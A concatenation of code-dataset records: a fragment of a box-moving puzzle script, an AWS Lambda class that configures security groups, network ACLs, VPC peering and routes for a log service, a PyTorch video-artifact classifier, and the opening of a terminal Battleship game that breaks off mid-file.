the soap and the wig from Box 6.\nboxes[6].remove('soap')\nboxes[6].remove('wig')\n\n# Replace the puzzle with the beach in Box 10.\nboxes[10].remove('puzzle')\nboxes[10].append('beach')\n\n# Put the wig into Box 0.\nboxes[0].append('wig')\n\n# Put the table and the crown into Box 8.\nboxes[8].append('table')\nboxes[8].append('crown')\n\n# Move the magnet and the boat and the flower from Box 1 to Box 10.\nitems_to_move = ['magnet', 'boat', 'flower']\nfor item in items_to_move:\n boxes[1].remove(item)\n boxes[10].append(item)\n\n# Swap the beach in Box 10 with the helmet in Box 6.\nboxes[10].remove('beach')\nboxes[6].remove('helmet')\nboxes[10].append('helmet')\nboxes[6].append('beach')\n\n# Print the boxes\nfor box_number, items in boxes.items():\n print(f\"Box {box_number}: {items}\")","repo_name":"NLP-KU/fulgid","sub_path":"boxes/results/complex-boxes-dataset/code/gpt-3.5-turbo/ba12d63581.py","file_name":"ba12d63581.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"20868872887","text":"import logging\nimport os\nimport time\n\nimport boto3\nimport ipaddr\nfrom botocore import config\nfrom botocore.exceptions import ClientError\nfrom util.exception import APIException\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\nsolution_version = os.environ.get('SOLUTION_VERSION', 'v1.0.0')\nsolution_id = os.environ.get('SOLUTION_ID', 'SO8025')\nuser_agent_config = {\n 'user_agent_extra': f'AwsSolution/{solution_id}/{solution_version}'}\ndefault_config = config.Config(**user_agent_config)\n\ndefault_region = os.environ.get('AWS_REGION')\n\nloghub_vpc_id = os.environ.get('DEFAULT_VPC_ID')\nloghub_sg_id = os.environ.get('DEFAULT_SG_ID')\nloghub_private_subnet_ids_str = os.environ.get('DEFAULT_PRIVATE_SUBNET_IDS')\nec2 = boto3.client('ec2', config=default_config)\n\n\ndef handle_error(func):\n \"\"\" Decorator for exception handling \"\"\"\n\n def wrapper(*args, **kwargs):\n try:\n return func(*args, **kwargs)\n except APIException as e:\n logger.error(e)\n raise e\n except Exception as e:\n logger.error(e)\n raise RuntimeError(\n 'Unknown exception, please check Lambda log for more details')\n\n return wrapper\nclass ClusterAutoImportManager:\n \"\"\"\n Currently do not consider processing ipv6 scenarios\n \"\"\"\n Anywhere_ipv4 = '0.0.0.0/0'\n\n def __init__(self, tags: None, ec2: boto3.Session.client, es_resp, loghub_vpc_id: str, loghub_sg_id: str,\n loghub_private_subnet_ids_str: str):\n self.tags = []\n if tags:\n for tag in tags:\n self.tags.append({\n 'Key': tag['key'],\n 'Value': tag['value'],\n })\n\n self.ec2 = ec2\n\n \"\"\"\n obtain aos_vpc_id,aos_subnet_ids,aos_sg_ids from 'es.describe_elasticsearch_domain' API \n \"\"\"\n\n es_vpc = es_resp['DomainStatus']['VPCOptions']\n self.aos_vpc_id = es_vpc['VPCId']\n self.aos_subnet_ids = es_vpc['SubnetIds']\n self.aos_sg_ids = es_vpc['SecurityGroupIds']\n\n \"\"\"\n the network_acl_id will be set value when calling 'validate_nacl()'\n \"\"\"\n self.aos_network_acl_id = None\n\n self.loghub_vpc_id = loghub_vpc_id\n self.loghub_sg_id = loghub_sg_id\n\n self.loghub_private_subnet_ids_str = loghub_private_subnet_ids_str\n self.loghub_private_subnet_ids =self.loghub_private_subnet_ids_str.split(',')\n\n \"\"\"\n By default, it is assumed that the vpcs are the same. \n Later, it will be verified whether the ids of the two vpcs are the same. \n If they are not the same, is_same_vpc will be changed to false.\n \"\"\"\n self.is_same_vpc = True\n\n \"\"\"\n The cidr of aos vpc does not conflict with the cidr of loghub vpc by default. \n When the ids of the two vpcs are different, the following code starts to verify whether the cidr is the same.\n \"\"\"\n\n self.vpc_peering_connection_id = None\n\n vpc_ids = [self.aos_vpc_id]\n if self.aos_vpc_id != self.loghub_vpc_id:\n self.is_same_vpc = False\n self.vpc_peering_connection_status = None\n\n self.loghub_vpc_subnet_ids = self.get_vpc_subnets(vpc_id=self.loghub_vpc_id)\n vpc_ids.append(self.loghub_vpc_id)\n for vpc_id in vpc_ids:\n try:\n response = self.ec2.describe_vpcs(\n VpcIds=[vpc_id],\n DryRun=False\n )\n except ClientError as e:\n logger.error(e)\n raise e\n\n # init cidr\n if 'Vpcs' not in response or response['Vpcs'] is False:\n raise APIException(f'the VPC is Not Found, id is {vpc_id}')\n if vpc_id == self.aos_vpc_id:\n self.aos_cidr_block = response['Vpcs'][0]['CidrBlock']\n else:\n self.loghub_cidr_block = response['Vpcs'][0]['CidrBlock']\n if not self.check_cidr_overlaps(self.aos_cidr_block, self.loghub_cidr_block):\n raise APIException('Log Hub VPC CIDR is conflict with AOS VPC!')\n self.vpc_peering_retry=0\n else:\n\n # Obtain cidr in the same vpc scenario.\n try:\n response = self.ec2.describe_vpcs(\n VpcIds=[self.aos_vpc_id],\n DryRun=False\n )\n except ClientError as e:\n logger.error(e)\n raise e\n if 'Vpcs' not in response:\n raise APIException(f'the VPC is Not Found, id is {self.aos_vpc_id}')\n self.aos_cidr_block = response['Vpcs'][0]['CidrBlock']\n self.loghub_cidr_block = self.aos_cidr_block\n\n # obtain aos_vpc_subnet_ids from 'ec2.describe_subnets' API\n self.aos_vpc_subnet_ids = self.get_vpc_subnets(vpc_id=self.aos_vpc_id)\n\n def check_cidr_overlaps(self, aos_cidr: str, loghub_cidr: str):\n \"\"\"\n Using ipaddr lib to check: True is Pass\n \"\"\"\n aos_network = ipaddr.IPNetwork(aos_cidr)\n loghub_network = ipaddr.IPNetwork(loghub_cidr)\n if not aos_network.overlaps(loghub_network) and not loghub_network.overlaps(aos_network):\n return True\n else:\n return False\n\n def validate_same_vpc(self):\n \"\"\"\n Check if it is the same vpc, return True if the same\n \"\"\"\n return self.is_same_vpc\n\n def validate_sg(self):\n \"\"\"\n Using 'ec2.describe_security_group_rules' API to check whether the rules of the aos security group\n allow access from the loghub process security group.\n Rules:\n 1.sg_rule['IsEgress']: False is inbound rule\n 2.sg_rule['IpProtocol']: tcp or -1 to specify all protocols\n 3.sg_rule['CidrIpv4']:\n 3.1. check 0.0.0.0/16 in same VPC scenarios\n 3.2. check loghub_cidr_block or 0.0.0.0/16 in different VPC scenarios\n 4.check sg_rule['ReferencedGroupInfo']['GroupId'] in same VPC scenarios: loghub_sg_id\n 5.sg_rule['FromPort'] <= 443 and sg_rule['ToPort'] >= 443\n \"\"\"\n success = False\n response = self.ec2.describe_security_group_rules(\n Filters=[\n {\n 'Name': 'group-id',\n 'Values': self.aos_sg_ids,\n },\n ],\n DryRun=False\n )\n if 'SecurityGroupRules' in response:\n sg_rules = response['SecurityGroupRules']\n for sg_rule in sg_rules:\n if self.validate_same_vpc():\n if sg_rule['IsEgress'] is False and (\n sg_rule['IpProtocol'] == 'tcp' or sg_rule['IpProtocol'] == '-1') and \\\n (sg_rule['FromPort'] <= 443) and (sg_rule['ToPort'] >= 443):\n if 'ReferencedGroupInfo' in sg_rule:\n if sg_rule['ReferencedGroupInfo']['GroupId'] == self.loghub_sg_id:\n success = True\n break\n elif 'CidrIpv4' in sg_rule:\n if sg_rule['CidrIpv4'] == ClusterAutoImportManager.Anywhere_ipv4:\n success = True\n break\n else:\n if 'CidrIpv4' in sg_rule:\n if sg_rule['IsEgress'] is False and \\\n (sg_rule['CidrIpv4'] == self.loghub_cidr_block or\n sg_rule['CidrIpv4'] == ClusterAutoImportManager.Anywhere_ipv4) and \\\n sg_rule['IpProtocol'] == 'tcp' and \\\n sg_rule['FromPort'] <= 443 and sg_rule['ToPort'] >= 443:\n success = True\n break\n\n return success\n\n def validate_nacl(self):\n \"\"\"\n Using 'ec2.describe_network_acls' API to check whether the rules of the aos nacl\n \"\"\"\n success = False\n response = self.ec2.describe_network_acls(\n Filters=[\n {\n 'Name': 'association.subnet-id',\n 'Values': self.aos_vpc_subnet_ids,\n },\n {\n 'Name': 'vpc-id',\n 'Values': [\n self.aos_vpc_id,\n ]\n }\n ],\n DryRun=False\n )\n\n if 'NetworkAcls' in response:\n nacls = response['NetworkAcls']\n for nacl in nacls:\n if 'NetworkAclId' in nacl:\n self.aos_network_acl_id = nacl['NetworkAclId']\n if 'Entries' in nacl:\n entries = nacl['Entries']\n for entry in entries:\n if entry['Egress'] is False and (\n entry['CidrBlock'] == ClusterAutoImportManager.Anywhere_ipv4 or\n entry['CidrBlock'] == self.loghub_cidr_block) and (\n entry['Protocol'] == '-1' or entry['Protocol'] == '6') and \\\n entry['RuleAction'] == 'allow':\n if 'PortRange' in entry:\n if (entry['PortRange']['From'] <= 443) and (entry['PortRange']['To'] >= 443):\n success = True\n break\n elif entry['Protocol'] == '-1':\n success = True\n break\n if success:\n break\n\n return success\n\n def validate_aos_vpc_routing(self):\n return self.validate_routing(self.aos_vpc_id, self.aos_subnet_ids, self.loghub_cidr_block)\n\n def validate_loghub_vpc_routing(self):\n return self.validate_routing(self.loghub_vpc_id, self.loghub_private_subnet_ids, self.aos_cidr_block)\n\n def validate_routing(self, vpc_id, vpc_subnet_ids, cidr_block):\n \"\"\"\n Check if routing table contains vpc_peering_connection_id.\n 1.No need to check in the same vpc scenario, it returns True.\n 2.Calling 'get_vpc_peering_connections' API to vpc_peering_connection_id.\n 3.Using 'ec2.describe_route_tables' API to check, if it returns True, the verification passes.\n 4.In different VPC scenarios, you not only need to call 'validate_aos_vpc_routing()'\n to verify the routing table of aos vpc, but also call 'validate_loghub_vpc_routing()'\n to verify the routing table of the vpc of loghub.\n \"\"\"\n success = False\n if not self.validate_same_vpc():\n if self.get_vpc_peering_connections() is None:\n return False\n\n response = self.ec2.describe_route_tables(\n Filters=[\n {\n 'Name': 'vpc-id',\n 'Values': [\n vpc_id\n ]\n },\n {\n 'Name': 'association.subnet-id',\n 'Values': vpc_subnet_ids,\n },\n {\n 'Name': 'route.vpc-peering-connection-id',\n 'Values': [self.vpc_peering_connection_id],\n },\n {\n 'Name': 'route.destination-cidr-block',\n 'Values': [cidr_block],\n }\n ],\n DryRun=False\n )\n count = 0\n if 'RouteTables' in response:\n route_tables = response['RouteTables']\n for route_table in route_tables:\n if 'Routes' in route_table:\n routes = route_table['Routes']\n for route in routes:\n if 'VpcPeeringConnectionId' in route and 'State' in route and \\\n route['VpcPeeringConnectionId'] == self.vpc_peering_connection_id and \\\n route['State'] == 'active':\n count = count + 1\n # success = True\n # break\n # if success:\n # break\n if count == len(vpc_subnet_ids):\n success = True\n else:\n success = True\n return success\n\n def get_vpc_subnets(self, vpc_id: str):\n \"\"\"\n Obtain the subnet_ids of vpc from \"ec2.describe_subnets\" API.\n \"\"\"\n filters = [\n {\n 'Name': 'vpc-id',\n 'Values': [\n vpc_id,\n ]\n },\n ] \n response = self.ec2.describe_subnets(\n Filters=filters,\n DryRun=False\n )\n subnet_ids = []\n if 'Subnets' in response:\n subnets = response['Subnets']\n for subnet in subnets: \n subnet_ids.append(subnet['SubnetId'])\n else:\n raise APIException(f'Please check the subnets of vpc, vpc id is {vpc_id}')\n return subnet_ids\n\n def get_vpc_peering_connections(self):\n \"\"\"\n Obtain the vpc_peering_connection_id from \"ec2.describe_vpc_peering_connections\" API by aos_vpc_id\n and loghub_vpc_id\n \"\"\"\n if not self.validate_same_vpc():\n response = self.ec2.describe_vpc_peering_connections(\n Filters=[\n {\n 'Name': 'requester-vpc-info.vpc-id',\n 'Values': [\n self.loghub_vpc_id,\n ]\n },\n {\n 'Name': 'accepter-vpc-info.vpc-id',\n 'Values': [\n self.aos_vpc_id,\n ]\n },\n {\n 'Name': 'status-code',\n 'Values': [\n 'active', 'provisioning', 'pending-acceptance'\n ]\n },\n ],\n DryRun=False\n )\n if 'VpcPeeringConnections' in response and response['VpcPeeringConnections']:\n self.vpc_peering_connection_id = response['VpcPeeringConnections'][0]['VpcPeeringConnectionId']\n self.vpc_peering_connection_status = response['VpcPeeringConnections'][0]['Status']\n return self.vpc_peering_connection_id\n\n def create_sg_rule(self):\n \"\"\"\n add sg ingress rule to allow members in the loghub processing security group to access port 443\n 1.same vpc: allow loghub_sg_id\n 2.not the same vpc: allow loghub_cidr_block\n \"\"\"\n if self.validate_same_vpc():\n ip_permissions = [\n {\n 'FromPort': 443,\n 'IpProtocol': 'tcp',\n 'UserIdGroupPairs': [\n {\n 'Description': 'Loghub Processing Rule',\n 'GroupId': self.loghub_sg_id,\n 'VpcId': self.aos_vpc_id\n },\n ],\n 'ToPort': 443,\n },\n ]\n else:\n ip_permissions = [\n {\n 'FromPort': 443,\n 'IpProtocol': 'tcp',\n 'IpRanges': [\n {\n 'CidrIp': self.loghub_cidr_block,\n 'Description': 'Loghub Processing Rule'\n },\n ],\n 'ToPort': 443,\n },\n ]\n response = self.ec2.authorize_security_group_ingress(\n GroupId=self.aos_sg_ids[0],\n IpPermissions=ip_permissions,\n DryRun=False,\n )\n\n if 'Return' in response and response['Return'] is True:\n return True\n else:\n return False\n\n def create_nacl_entry(self):\n \"\"\"\n Add an inbound rule to NACL to allow Loghub CIDR to allow access to port 443.\n This method only needs to be called when the vpc of loghub is different from that of aos\n \"\"\"\n self.ec2.create_network_acl_entry(\n CidrBlock=self.loghub_cidr_block,\n DryRun=False,\n Egress=False,\n NetworkAclId=self.aos_network_acl_id,\n PortRange={\n 'From': 443,\n 'To': 443\n },\n Protocol='6',\n RuleAction='allow',\n RuleNumber=666\n )\n\n def create_vpc_peering_connection(self):\n \"\"\"\n Create vpc peering between Loghub vpc and aos vpc.\n This method only needs to be called when the vpc of loghub is different from that of AOS.\n \"\"\"\n if not self.validate_same_vpc():\n tag_specifications = []\n if self.tags:\n tag_specifications.append({\n 'ResourceType': 'vpc-peering-connection',\n 'Tags': self.tags,\n\n })\n response = self.ec2.create_vpc_peering_connection(\n DryRun=False,\n PeerVpcId=self.aos_vpc_id,\n VpcId=self.loghub_vpc_id,\n TagSpecifications=tag_specifications\n )\n if 'VpcPeeringConnection' in response:\n vpc_peering_connection_id = response['VpcPeeringConnection']['VpcPeeringConnectionId']\n self.accept_vpc_peering_connection(vpc_peering_connection_id)\n\n def accept_vpc_peering_connection(self, vpc_peering_connection_id: str):\n try:\n response = self.ec2.accept_vpc_peering_connection(\n DryRun=False,\n VpcPeeringConnectionId=vpc_peering_connection_id\n )\n if 'VpcPeeringConnection' in response:\n status = response['VpcPeeringConnection']['Status']\n logger.info(\n f'accept vpc peering, status is {status},VpcPeeringConnectionId is {vpc_peering_connection_id}')\n except ClientError as ex:\n if ex.response['Error']['Code'] == 'InvalidVpcPeeringConnectionID.NotFound':\n time.sleep(1)\n self.vpc_peering_retry=self.vpc_peering_retry+1\n if self.vpc_peering_retry==4:\n raise ex\n return self.accept_vpc_peering_connection(vpc_peering_connection_id)\n else:\n raise ex\n\n def create_aos_route(self):\n \"\"\"\n Create route in the ids of aos.\n \"\"\"\n aos_route_table_ids = self.get_route_table_ids(self.aos_vpc_id, self.aos_subnet_ids)\n for aos_route_table_id in aos_route_table_ids:\n self.create_route(self.loghub_cidr_block, aos_route_table_id)\n\n def create_loghub_route(self):\n \"\"\"\n Create route in the vpc of loghub\n \"\"\"\n loghub_route_table_ids = self.get_route_table_ids(self.loghub_vpc_id, self.loghub_private_subnet_ids)\n for loghub_route_table_id in loghub_route_table_ids:\n self.create_route(self.aos_cidr_block, loghub_route_table_id)\n\n def create_route(self, cidr_block, route_table_id):\n \"\"\"\n create a route in the route table for vpc peering connection\n \"\"\"\n\n try:\n response = self.ec2.create_route(\n DestinationCidrBlock=cidr_block,\n DryRun=False,\n RouteTableId=route_table_id,\n VpcPeeringConnectionId=self.vpc_peering_connection_id\n )\n if response and 'Return' in response and response['Return'] is True:\n return True\n else:\n return False\n except ClientError as ex:\n if ex.response['Error']['Code'] == 'RouteAlreadyExists':\n return True\n else:\n raise ex\n\n def get_route_table_ids(self, vpc_id: str, subnet_ids: list):\n \"\"\"\n Obtain the route table id from calling 'describe_route_tables' API by vpc_id, subnet_ids\n \"\"\"\"\"\n response = self.ec2.describe_route_tables(\n Filters=[\n {\n 'Name': 'vpc-id',\n 'Values': [\n vpc_id\n ]\n },\n {\n 'Name': 'association.subnet-id',\n 'Values': subnet_ids,\n }\n ],\n DryRun=False\n )\n route_table_ids = []\n if 'RouteTables' in response:\n route_tables = response['RouteTables']\n for route_table in route_tables:\n if 'Associations' in route_table:\n associations = route_table['Associations']\n for association in associations:\n route_table_ids.append(association['RouteTableId'])\n\n if not route_table_ids:\n raise APIException(f'Please check the route table of vpc, vpc id is {vpc_id}')\n return route_table_ids\n\n def check_all(self):\n if not self.validate_sg():\n self.create_sg_rule()\n if not self.validate_nacl():\n self.create_nacl_entry()\n if not self.get_vpc_peering_connections():\n self.create_vpc_peering_connection()\n elif self.vpc_peering_connection_status == 'pending-acceptance':\n self.accept_vpc_peering_connection(self.vpc_peering_connection_id)\n if not self.validate_aos_vpc_routing():\n self.create_aos_route()\n if not self.validate_loghub_vpc_routing():\n self.create_loghub_route()\n\n def check_all_aos_cidr_overlaps(self,region=default_region,existed_aos_list=list())->bool:\n \"\"\"\n Using ipaddr lib to check: True is Pass\n \"\"\"\n not_conflict=True\n import_in_same_vpc=False\n if self.aos_vpc_id != self.loghub_vpc_id:\n if not existed_aos_list or len(existed_aos_list)==0:\n return True \n es = boto3.client('es', region_name=region, config=default_config)\n vpc_ids=[]\n for aos in existed_aos_list:\n domain_name=aos['domainName']\n existed_aos_region=aos['region']\n try:\n if region!=existed_aos_region:\n region=existed_aos_region\n es = boto3.client('es', region_name=region, config=default_config)\n es_resp = es.describe_elasticsearch_domain(DomainName=domain_name)\n es_vpc = es_resp['DomainStatus']['VPCOptions']\n if self.aos_vpc_id==es_vpc['VPCId']:\n import_in_same_vpc=True\n break\n vpc_ids.append(es_vpc['VPCId'])\n except ClientError as e:\n if e.response['Error']['Code'] == 'ResourceNotFoundException':\n raise APIException('OpenSearch Domain Not Found')\n else:\n raise e\n if not import_in_same_vpc:\n try:\n response = self.ec2.describe_vpcs(VpcIds=vpc_ids,DryRun=False)\n except ClientError as e:\n logger.error(e)\n raise e\n # init cidr\n if 'Vpcs' not in response or response['Vpcs'] is False:\n raise APIException(f'the VPC is Not Found, id list is {vpc_ids}')\n \n vpcs=response['Vpcs']\n for vpc in vpcs:\n existed_aos_cidr_block = vpc['CidrBlock'] \n if not self.check_cidr_overlaps(self.aos_cidr_block, existed_aos_cidr_block):\n raise APIException(\"We can't import AOS, its CIDR conflicts with imported AOS!\")\n \n return not_conflict\n\n \n \n ","repo_name":"AlbertMingXu/log-hub","sub_path":"source/constructs/lambda/api/cluster/cluster_auto_import_mgr.py","file_name":"cluster_auto_import_mgr.py","file_ext":"py","file_size_in_byte":24342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"39"} +{"seq_id":"71769753715","text":"import os\r\n\r\nimport torch\r\nimport torch.nn as nn\r\n\r\nfrom models.detector import build_detector_S, build_detector_B\r\nfrom models.modules.RFB import RFB_modified, RFB3D_modified, BasicConv2d\r\n\r\nPATH_CWD = os.path.dirname(os.path.abspath(__file__))\r\n\r\n\r\nclass TAC(nn.Module):\r\n \"\"\"spatial-temporal artifact tracking Module\"\"\"\r\n\r\n def __init__(self, num_class, in_channels, mid_channel=16, lstm_channel=320, num_layers=1):\r\n super().__init__()\r\n\r\n self.bconv1_x = BasicConv2d(in_channels[0], in_channels[0] // 2, 3, padding=1)\r\n self.bconv1_y = BasicConv2d(1, mid_channel, 3, padding=1)\r\n self.bconv2_x = BasicConv2d(in_channels[1], in_channels[1] // 2, 3, padding=1)\r\n self.bconv2_y = BasicConv2d(1, mid_channel, 3, padding=1)\r\n self.bconv3_x = BasicConv2d(in_channels[2], in_channels[2] // 2, 3, padding=1)\r\n self.bconv3_y = BasicConv2d(1, mid_channel, 3, padding=1)\r\n self.bconv4_x = BasicConv2d(in_channels[3], in_channels[3] // 2, 3, padding=1)\r\n self.bconv4_y = BasicConv2d(1, mid_channel, 3, padding=1)\r\n\r\n self.down_sample = nn.MaxPool2d(3, stride=2, padding=1)\r\n\r\n self.fusion1 = self.get_fusion_sequential(in_channels[1] // 2 + in_channels[0] // 2 + 2 * mid_channel,in_channels[0])\r\n self.fusion2 = self.get_fusion_sequential(in_channels[2] // 2 + in_channels[0] + mid_channel, in_channels[1])\r\n self.fusion3 = self.get_fusion_sequential(in_channels[3] // 2 + in_channels[1] + mid_channel, in_channels[2])\r\n self.ave_pool = nn.AdaptiveAvgPool2d((1, 1))\r\n\r\n self.lstm = nn.LSTM(in_channels[2], lstm_channel, num_layers, batch_first=True)\r\n self.fc = nn.Linear(lstm_channel, num_class)\r\n\r\n @staticmethod\r\n def get_fusion_sequential(in_channel, out_channel):\r\n return nn.Sequential(\r\n BasicConv2d(in_channel, out_channel, 1),\r\n BasicConv2d(out_channel, out_channel, kernel_size=(3, 5), padding=(1, 2)),\r\n BasicConv2d(out_channel, out_channel, kernel_size=(5, 3), padding=(2, 1)),\r\n BasicConv2d(out_channel, out_channel, 3, padding=(5, 5), dilation=(5, 5))\r\n )\r\n\r\n def forward(self, x, y, t):\r\n assert isinstance(x, list), f\"The input type of x should be list\"\r\n assert isinstance(y, list), \"The input type of y should be list\"\r\n f1, f2, f3, f4 = x\r\n y1, y2, y3, y4 = y\r\n\r\n f1 = torch.cat([self.bconv1_x(f1 + f1 * torch.sigmoid(y1)), self.bconv1_y(y1)], dim=1)\r\n f2 = torch.cat([self.bconv2_x(f2 + f2 * torch.sigmoid(y2)), self.bconv2_y(y2)], dim=1)\r\n f3 = torch.cat([self.bconv3_x(f3 + f3 * torch.sigmoid(y3)), self.bconv3_y(y3)], dim=1)\r\n f4 = torch.cat([self.bconv4_x(f4), self.bconv4_y(y4)], dim=1)\r\n\r\n f1 = self.down_sample(f1)\r\n f2 = self.down_sample(self.fusion1(torch.cat([f1, f2], dim=1)))\r\n f3 = self.down_sample(self.fusion2(torch.cat([f2, f3], dim=1)))\r\n f4 = self.fusion3(torch.cat([f3, f4], dim=1))\r\n x = self.ave_pool(f4)\r\n bt, c, h, w = x.shape\r\n y = x.view([bt // t, t, c])\r\n y, _ = self.lstm(y)\r\n y = self.fc(y[:, -1, :])\r\n return y\r\n\r\n\r\nclass Classifier(nn.Module):\r\n def __init__(self, detector, num_class, in_channels, mid_channel=16):\r\n super(Classifier, self).__init__()\r\n self.detector = detector\r\n self.tac = TAC(num_class=num_class, mid_channel=mid_channel, in_channels=in_channels)\r\n\r\n self._freeze_detector()\r\n\r\n def forward(self, x):\r\n b, c, t, h, w = x.shape\r\n x = x.permute(0, 2, 1, 3, 4).reshape([b * t, c, h, w])\r\n list_dtc_feat, list_dtc_result = self.detector.forward_for_classifier(x)\r\n\r\n list_dtc_result = list_dtc_result[1:][::-1]\r\n\r\n list_dtc_feat_re = []\r\n for i, dtc_result in enumerate(list_dtc_result):\r\n fr = list_dtc_result[i].shape[-1]\r\n list_dtc_feat_re.append(list_dtc_feat[i].reshape([b * t, fr, fr, -1]).permute(0, 3, 1, 2))\r\n\r\n y = self.tac(list_dtc_feat_re, list_dtc_result, t)\r\n return y\r\n\r\n def get_training_parameters(self):\r\n return filter(lambda p: p.requires_grad, self.parameters())\r\n\r\n def _freeze_detector(self):\r\n self.detector.train(False)\r\n for param in self.detector.parameters():\r\n param.requires_grad = False\r\n\r\n def train(self, mode=True):\r\n \"\"\"Convert the model into training mode while keep layers freezed.\"\"\"\r\n super(Classifier, self).train(mode)\r\n self._freeze_detector()\r\n\r\n\r\ndef build_classifier_S(neck_depth, path_checkpoint_dtc=None):\r\n detector, dim = build_detector_S(frozen_stages=4, return_dim=True,neck_depth=neck_depth)\r\n if path_checkpoint_dtc == \"\" or not os.path.exists(path_checkpoint_dtc) or path_checkpoint_dtc is None:\r\n print(f\"detector is not loaded to trained weights: {path_checkpoint_dtc}\")\r\n else:\r\n checkpoint_detector = torch.load(path_checkpoint_dtc)\r\n detector.load_state_dict(checkpoint_detector['model_state_dict'])\r\n print(\"detector weights is successfully loaded, the best metric is\", checkpoint_detector['metric_best'])\r\n classifier = Classifier(detector, num_class=2, in_channels=[dim, dim * 2, dim * 4, dim * 8])\r\n return classifier\r\n\r\ndef build_classifier_B(neck_depth, path_checkpoint_dtc=None):\r\n detector, dim = build_detector_B(frozen_stages=4, return_dim=True,neck_depth=neck_depth)\r\n if path_checkpoint_dtc == \"\" or not os.path.exists(path_checkpoint_dtc) or path_checkpoint_dtc is None:\r\n print(f\"detector is not loaded to trained weights: {path_checkpoint_dtc}\")\r\n else:\r\n checkpoint_detector = torch.load(path_checkpoint_dtc)\r\n detector.load_state_dict(checkpoint_detector['model_state_dict'])\r\n print(\"detector weights is successfully loaded, the best metric is\", checkpoint_detector['metric_best'])\r\n classifier = Classifier(detector, num_class=2, in_channels=[dim, dim * 2, dim * 4, dim * 8])\r\n return classifier\r\n\r\n\r\nif __name__ == '__main__':\r\n import time\r\n\r\n ti = time.time()\r\n \"\"\"tem = 9\r\n dummy_x = []\r\n for i in range(tem):\r\n dummy_x += [torch.randn(1, 1, 28, 28), torch.randn(1, 1, 7, 7), torch.randn(1, 1, 14, 14),\r\n torch.randn(1, 1, 28, 28), torch.randn(1, 1, 56, 56), torch.randn(1, 1, 224, 224)]\r\n model = NSCC(2)\"\"\"\r\n\r\n dummy_x = torch.rand(8, 3, 11, 224, 224).to(\"cuda:0\")\r\n model = build_classifier_S([4,4,2,2],\r\n path_checkpoint_dtc=r\"D:\\MyWorkPlace\\python\\ProjectZZA\\tools\\detection\\2023-10-18-16\\checkpoint_best.pth\").to(\r\n \"cuda:0\")\r\n a = model(dummy_x)\r\n print(time.time() - ti)\r\n pass\r\n","repo_name":"Charluelexia/two_stage","sub_path":"models/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":6673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"11535673252","text":"# Adam Fernandes\n# November 2019\n# Battleship Game: human v. ai; game is immediately loaded up with preset ships.\n# Optimized to run from terminal/command prompt; formatting can look wonky on certain IDEs (for example: PyCharm).\n\nimport random\n\n# The boards are the visible outputs to stdout, whereas the goals will contain the ships that the player and the\n# ai are trying to sink (in other words, the opponent's ship locations).\nplayer_board = None\nai_board = None\nplayer_goals = None\nai_goals = None\n\n# The first dictionaries hold the lengths for each type of ship (abbreviations of the ships are the keys).\n# Note that ship_to_length variables detail what the opponent wants to destroy.\n# The second dictionary holds the longer names for each type of ship (abbreviations of the ships are the keys).\nai_ship_to_length = {'P': 2, 'D': 3, 'B': 4, 'C': 5}\nplayer_ship_to_length = {'P': 2, 'D': 3, 'B': 4, 'C': 5}\nship_to_name = {'P': \"patrol boat\", 'D': \"destroyer\", 'B': \"battleship\", 'C': \"carrier\"}\n\n# 14 lives for player, 14 for ai, because total area for the ships amount to 14.\nplayer_lives = 14\nai_lives = 14\n\n# If orientation is 1, the ship orientation is vertical. If 0, horizontal.\n# Ship row and ship column hold the corresponding coordinates of the ship for\n# when the ships are being assigned randomly to the boards.\nship_orientation = None\nship_row = None\nship_column = None\n\n# If turn is odd, player's turn. Otherwise, ai's.\nturn = 1\n\n# These variables hold the player's and ai's row and columns during each turn.\ninput_row = None\ninput_column = None\n\n# Returns a brand new, untarnished board.\ndef get_new_board():\n return [['~','~','~','~','~','~','~','~','~','~'],\n ['~','~','~','~','~','~','~','~','~','~'],\n ['~','~','~','~','~','~','~','~','~','~'],\n ['~','~','~','~','~','~','~','~','~','~'],\n ['~','~','~','~','~','~','~','~','~','~'],\n ['~','~','~','~','~','~','~','~','~','~'],\n ['~','~','~','~','~','~','~','~','~','~'],\n ['~','~','~','~','~','~','~','~','~','~'],\n ['~','~','~','~','~','~','~','~','~','~'],\n ['~','~','~','~','~','~','~','~','~','~']]\n\n# Prints a row of a board.\ndef print_board_row(b, row):\n for i in range(0, 10, 1):\n if i != 10:\n print(str(b[row][i]).rjust(2), end = \" \")\n else:\n print(str(b[row][i]).rjust(2), end = \"\")\n\n# Just prints one board.\ndef print_board(b):\n print(\"\\t\", end = \"\")\n for i in range(1, 11, 1):\n if i == 10:\n print(str(i).rjust(2))\n else:\n print(str(i).rjust(2), end=\" \")\n for i in range(0, 10, 1):\n print(str(i + 1).rjust(2), end = \"\\t\")\n print_board_row(b, i)\n print()\n\n# Prints both boards, with b1 being the human's playing board and b2 being the computer's.\ndef print_boards(b1, b2):\n # 40, a \"magic number,\" is just the width of one player's board.\n print(\"Your board:\".center(40), end = \"\")\n print(\"Enemy (AI's) board:\".center(40))\n print(\"\\t\", end=\"\")\n for i in range(2):\n for j in range(1, 11, 1):\n if i == 1 and j == 10:\n print(str(j).rjust(2))\n else:\n print(str(j).rjust(2), end = \" \")\n # Print tabs so the enemy's board is far enough away to allow for easier viewing.\n if i == 0:\n print(\"\\t\\t\", end=\"\")\n\n for i in range(0, 10, 1):\n print(str(i + 1).rjust(2), end = \"\\t\")\n print_board_row(b1, i)\n print(\" | \", end = \"\")\n print(str(i + 1).rjust(2), end=\"\\t\")\n print_board_row(b2, i)\n print()\n\n# Outputs a number between [0,1] for ship orientation, [0,9] for ship row, and [0,9] for ship column\ndef randomize():\n orientation = random.randint(0,1)\n row = random.randint(0,9)\n col = random.randint(0,9)\n return orientation, row, col\n\n# Takes in a board, a starting coordinate, and an ending coordinate, and outputs a 1\n# if a ship is allowed to be placed within those coordinates (i.e.: free \"ocean\" space), otherwise, outputs 0.\ndef is_free_to_place_ship(b, length, row, column, orientation):\n if orientation == 1 and row + length > 9 or orientation == 0 and column + length > 9:\n return 0\n for i in range(0, length, 1):\n if orientation == 1:\n if b[row + i][column] != '~':\n return 0\n else:\n if b[row][column + i] != '~':\n return 0\n return 1\n\n# Places a specified ship's symbols (denoting which ship it is) onto a specified board.\ndef 